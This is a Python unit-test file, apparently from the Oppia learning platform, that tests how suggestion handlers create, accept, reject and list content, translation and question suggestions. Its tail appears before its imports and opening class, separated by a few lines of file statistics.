self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.skill_id,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.skill_id,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_cannot_access_suggestion_to_skill_handler(self):
self.login(self.ADMIN_EMAIL)
thread_id = feedback_services.create_thread(
feconf.ENTITY_TYPE_QUESTION, self.skill_id,
self.author_id, 'description', '', has_suggestion=True)
csrf_token = self.get_new_csrf_token()
self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, self.skill_id,
thread_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.logout()
def test_suggestion_to_skill_handler_with_invalid_target_type(self):
self.login(self.ADMIN_EMAIL)
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.admin_id)
new_content = state_domain.SubtitledHtml(
'content', '<p>new content html</p>').to_dict()
change_cmd = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': new_content
}
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT,
feconf.ENTITY_TYPE_EXPLORATION, exp_id, 1,
self.author_id, change_cmd, 'sample description')
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.author_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
self.skill_id, suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'This handler allows actions only on suggestions to skills.')
self.logout()
def test_suggestion_to_skill_handler_with_invalid_target_id(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
'skill_id', suggestion_to_accept['suggestion_id']),
{
'action': u'reject',
'review_message': u'Rejected!'
},
csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'The skill id provided does not match the skill id '
'present as part of the suggestion_id')
self.logout()
def test_suggestion_to_skill_handler_with_invalid_action(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']),
{'action': 'invalid_action'}, csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid action.')
self.logout()
def test_reject_suggestion_to_skill(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_reject = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_reject['target_id'],
suggestion_to_reject['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_REJECTED)
self.logout()
def test_accept_suggestion_to_skill(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted!',
'skill_id': self.skill_id
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_reviewer_accept_suggestion_to_skill(self):
self.login(self.REVIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted!',
'skill_id': self.skill_id
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_ACCEPTED)
self.logout()
class UserSubmittedSuggestionsHandlerTest(test_utils.GenericTestBase):
"""Unit test for the UserSubmittedSuggestionsHandler."""
AUTHOR_EMAIL = 'author@example.com'
def setUp(self):
super(UserSubmittedSuggestionsHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.TOPIC_ID = 'topic'
self.STORY_ID = 'story'
self.EXP_ID = 'exp1'
# Needs to be 12 characters long.
self.SKILL_ID = 'skill1234567'
self.SKILL_DESCRIPTION = 'skill to link question to'
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.owner_id, title='Exploration title',
category='Algebra', end_state_name='End State',
correctness_feedback_enabled=True)
self.publish_exploration(self.owner_id, self.EXP_ID)
topic = topic_domain.Topic.create_default_topic(
self.TOPIC_ID, 'topic', 'abbrev', 'description')
topic.thumbnail_filename = 'thumbnail.svg'
topic.thumbnail_bg_color = '#C6DCDA'
topic.subtopics = [
topic_domain.Subtopic(
1, 'Title', ['skill_id_333'], 'image.svg',
constants.ALLOWED_THUMBNAIL_BG_COLORS['subtopic'][0],
'dummy-subtopic-three')]
topic.next_subtopic_id = 2
topic_services.save_new_topic(self.owner_id, topic)
topic_services.publish_topic(self.TOPIC_ID, self.admin_id)
story = story_domain.Story.create_default_story(
self.STORY_ID, 'A story', 'Description', self.TOPIC_ID, 'story-a')
story_services.save_new_story(self.owner_id, story)
topic_services.add_canonical_story(
self.owner_id, self.TOPIC_ID, self.STORY_ID)
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.admin_id)
story_services.update_story(
self.owner_id, self.STORY_ID, [story_domain.StoryChange({
'cmd': 'add_story_node',
'node_id': 'node_1',
'title': 'Node1',
}), story_domain.StoryChange({
'cmd': 'update_story_node_property',
'property_name': 'exploration_id',
'node_id': 'node_1',
'old_value': None,
'new_value': self.EXP_ID
})], 'Changes.')
self.save_new_skill(
self.SKILL_ID, self.owner_id, description=self.SKILL_DESCRIPTION)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.editor_id
self.set_admins([self.ADMIN_USERNAME])
self.editor = user_services.UserActionsInfo(self.editor_id)
# Login and create exploration and suggestions.
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.owner_id, self.EXP_ID, [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': '<p>new content html</p>'
}
})], 'Add content')
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': (feconf.ENTITY_TYPE_EXPLORATION),
'target_id': self.EXP_ID,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>new content html</p>',
'translation_html': '<p>new content html in Hindi</p>'
},
'description': 'Adds translation',
}, csrf_token=csrf_token)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': None,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_exploration_handler_returns_data(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getsubmittedsuggestions/topic/translate_content')
self.assertEqual(response, {})
def test_skill_handler_returns_data(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getsubmittedsuggestions/topic/add_question')
self.assertEqual(response, {})
def test_question_suggestions_data_for_deleted_opportunities(self):
self.login(self.AUTHOR_EMAIL)
opportunity_services.delete_skill_opportunity(self.SKILL_ID)
response = self.get_json(
'/getsubmittedsuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
self.assertEqual(
response['target_id_to_opportunity_dict'][self.SKILL_ID], None)
def test_translation_suggestions_data_for_deleted_opportunities(self):
self.login(self.AUTHOR_EMAIL)
opportunity_services.delete_exploration_opportunities([self.EXP_ID])
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
self.assertEqual(
response['target_id_to_opportunity_dict'][self.EXP_ID], None)
def test_handler_with_invalid_suggestion_type_raise_error(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getsubmittedsuggestions/exploration/invalid_suggestion_type',
expected_status_int=400)
def test_handler_with_invalid_target_type_raise_error(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getsubmittedsuggestions/invalid_target_type'
'/translate_content', expected_status_int=400)
class ReviewableSuggestionsHandlerTest(test_utils.GenericTestBase):
"""Unit test for the ReviewableSuggestionsHandler."""
def setUp(self):
super(ReviewableSuggestionsHandlerTest, self).setUp()
self.AUTHOR_EMAIL = 'author@example.com'
self.REVIEWER_EMAIL = 'reviewer@example.com'
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.editor = user_services.UserActionsInfo(self.editor_id)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.TOPIC_ID = 'topic'
self.STORY_ID = 'story'
self.EXP_ID = 'exp1'
# Needs to be 12 characters long.
self.SKILL_ID = 'skill1234567'
self.SKILL_DESCRIPTION = 'skill to link question to'
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.owner_id, title='Exploration title',
category='Algebra', end_state_name='End State',
correctness_feedback_enabled=True)
self.publish_exploration(self.owner_id, self.EXP_ID)
topic = topic_domain.Topic.create_default_topic(
self.TOPIC_ID, 'topic', 'abbrev', 'description')
topic.thumbnail_filename = 'thumbnail.svg'
topic.thumbnail_bg_color = '#C6DCDA'
topic.subtopics = [
topic_domain.Subtopic(
1, 'Title', ['skill_id_333'], 'image.svg',
constants.ALLOWED_THUMBNAIL_BG_COLORS['subtopic'][0],
'dummy-subtopic-three')]
topic.next_subtopic_id = 2
topic_services.save_new_topic(self.owner_id, topic)
topic_services.publish_topic(self.TOPIC_ID, self.admin_id)
story = story_domain.Story.create_default_story(
self.STORY_ID, 'A story', 'Description', self.TOPIC_ID, 'story-b')
story_services.save_new_story(self.owner_id, story)
topic_services.add_canonical_story(
self.owner_id, self.TOPIC_ID, self.STORY_ID)
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.admin_id)
story_services.update_story(
self.owner_id, self.STORY_ID, [story_domain.StoryChange({
'cmd': 'add_story_node',
'node_id': 'node_1',
'title': 'Node1',
}), story_domain.StoryChange({
'cmd': 'update_story_node_property',
'property_name': 'exploration_id',
'node_id': 'node_1',
'old_value': None,
'new_value': self.EXP_ID
})], 'Changes.')
self.save_new_skill(
self.SKILL_ID, self.owner_id, description=self.SKILL_DESCRIPTION)
user_services.allow_user_to_review_question(self.reviewer_id)
user_services.allow_user_to_review_translation_in_language(
self.reviewer_id, 'hi')
# Login and update exploration and suggestions.
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.owner_id, self.EXP_ID, [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': '<p>new content html</p>'
}
})], 'Add content')
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': (feconf.ENTITY_TYPE_EXPLORATION),
'target_id': self.EXP_ID,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>new content html</p>',
'translation_html': '<p>new content html in Hindi</p>'
},
'description': 'Adds translation',
}, csrf_token=csrf_token)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': None,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_exploration_handler_returns_data(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getreviewablesuggestions/topic/translate_content')
self.assertEqual(response, {})
def test_skill_handler_returns_data(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getreviewablesuggestions/topic/add_question')
self.assertEqual(response, {})
def test_handler_with_invalid_suggestion_type_raise_error(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getreviewablesuggestions/exploration/invalid_suggestion_type',
expected_status_int=404)
def test_handler_with_invalid_target_type_raise_error(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getreviewablesuggestions/invalid_target_type'
'/translate_content', expected_status_int=400)
| 41.249429
| 111
| 0.602195
|
from __future__ import absolute_import
from __future__ import unicode_literals
import os
from constants import constants
from core.domain import exp_domain
from core.domain import exp_fetchers
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import fs_domain
from core.domain import opportunity_services
from core.domain import question_domain
from core.domain import question_services
from core.domain import rights_domain
from core.domain import rights_manager
from core.domain import skill_services
from core.domain import state_domain
from core.domain import story_domain
from core.domain import story_services
from core.domain import suggestion_services
from core.domain import topic_domain
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
import feconf
import python_utils
(suggestion_models, feedback_models) = models.Registry.import_models([
models.NAMES.suggestion, models.NAMES.feedback])
class SuggestionUnitTests(test_utils.GenericTestBase):
IMAGE_UPLOAD_URL_PREFIX = '/createhandler/imageupload'
ASSET_HANDLER_URL_PREFIX = '/assetsdevhandler'
EXP_ID = 'exp1'
TRANSLATION_LANGUAGE_CODE = 'en'
AUTHOR_EMAIL = 'author@example.com'
AUTHOR_EMAIL_2 = 'author2@example.com'
REVIEWER_EMAIL = 'reviewer@example.com'
TRANSLATOR_EMAIL = 'translator@example.com'
NORMAL_USER_EMAIL = 'user@example.com'
def setUp(self):
super(SuggestionUnitTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.AUTHOR_EMAIL_2, 'author2')
self.signup(self.NORMAL_USER_EMAIL, 'normalUser')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.signup(self.TRANSLATOR_EMAIL, 'translator')
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.author_id_2 = self.get_user_id_from_email(self.AUTHOR_EMAIL_2)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.translator_id = self.get_user_id_from_email(self.TRANSLATOR_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
user_services.allow_user_to_review_translation_in_language(
self.reviewer_id, 'hi')
self.editor = user_services.UserActionsInfo(self.editor_id)
self.login(self.EDITOR_EMAIL)
exploration = (
self.save_new_linear_exp_with_state_names_and_interactions(
self.EXP_ID, self.editor_id, ['State 1', 'State 2', 'State 3'],
['TextInput'], category='Algebra'))
self.old_content = state_domain.SubtitledHtml(
'content', '<p>old content html</p>').to_dict()
exploration.states['State 1'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exploration.states['State 2'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exploration.states['State 3'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exp_services._save_exploration(self.editor_id, exploration, '', [])
rights_manager.publish_exploration(self.editor, self.EXP_ID)
rights_manager.assign_role_for_exploration(
self.editor, self.EXP_ID, self.owner_id, rights_domain.ROLE_EDITOR)
self.new_content = state_domain.SubtitledHtml(
'content', '<p>new content html</p>').to_dict()
self.resubmit_change_content = state_domain.SubtitledHtml(
'content', '<p>resubmit change content html</p>').to_dict()
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 1',
}, csrf_token=csrf_token)
self.logout()
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 2',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 2',
}, csrf_token=csrf_token)
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 3',
}, csrf_token=csrf_token)
self.logout()
self.login(self.TRANSLATOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'State 3',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>old content html</p>',
'translation_html': '<p>In Hindi</p>'
},
'description': 'change to state 3',
}, csrf_token=csrf_token)
self.logout()
def test_create_suggestion(self):
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'new_value': self.new_content
},
'description': 'change again to state 3',
}, csrf_token=csrf_token)
suggestions = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions']
self.assertEqual(len(suggestions), 3)
self.logout()
def test_create_suggestion_invalid_target_version_input(self):
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': 'invalid target version',
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'new_value': self.new_content
},
'description': 'change again to state 3',
}, csrf_token=csrf_token, expected_status_int=400)
suggestions = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions']
self.assertEqual(
response['error'],
'Expected target_version_at_submission to be an int, received <type'
' \'unicode\'>')
self.assertEqual(len(suggestions), 2)
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_suggestion_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'], 'invalid_suggestion_id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'Invalid format for suggestion_id. It must contain 3 parts '
'separated by \'.\'')
csrf_token = self.get_new_csrf_token()
self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
'exploration.target_id.id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token,
expected_status_int=404)
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_target_type(self):
self.login(self.EDITOR_EMAIL)
question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id'],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.editor_id)
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_ADD_QUESTION,
feconf.ENTITY_TYPE_TOPIC, exp_id, 1,
self.author_id, {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': question_dict,
'skill_id': None,
'skill_difficulty': 0.3
}, None)
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.author_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, exp_id,
suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'This handler allows actions only on suggestions to explorations.')
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_target_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
self.save_new_default_exploration('exp_id', self.editor_id)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, 'exp_id',
suggestion_to_accept['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'The exploration id provided does not match the exploration id '
'present as part of the suggestion_id')
self.logout()
    def test_owner_of_exploration_cannot_respond_to_own_suggestion(self):
self.login(self.EDITOR_EMAIL)
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.editor_id)
new_content = state_domain.SubtitledHtml(
